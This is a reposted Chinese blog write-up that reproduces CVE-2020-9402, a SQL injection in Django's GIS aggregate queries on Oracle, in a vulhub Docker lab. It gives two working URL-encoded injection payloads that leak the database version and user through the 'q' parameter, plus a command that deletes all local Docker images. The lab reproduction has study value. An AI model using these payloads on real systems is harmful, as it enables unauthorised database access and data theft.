ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

CVE-2020-9402 Django GIS SQL注入漏洞复现

2021-04-09 19:05:13  阅读:756  来源: 互联网

标签:20 target get Django 9402 20% SQL GIS 漏洞


CVE-2020-9402 Django GIS SQL注入漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

image-20210409182329274

查看监听端口

docker-compose ps

image-20210409182351787

访问http://target_ip:8000,成功看到页面

image-20210409182424652

0x02.漏洞介绍

该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句

0x03.漏洞复现

漏洞一

首先访问http://target_ip:8000/vuln/

在该网页中使用get方法构造q的参数,构造SQL注入的字符串20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1

payload

http://target_ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

image-20210409182706846

漏洞二

访问http://target_ip:8000/vuln2/。 在该网页中使用get方法构造q的参数,构造出SQL注入的字符串0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --

payload

http://target_ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--

image-20210409182904361

0x04.一点坑

这个环境要9个g,在装这个环境前我把之前装的镜像全删了

docker rmi $(docker images -q)

环境启动后会连不上去,此时很简单,睡个觉回来再看就行了

标签:20,target,get,Django,9402,20%,SQL,GIS,漏洞
来源: https://www.cnblogs.com/-Anguvia-/p/14638389.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有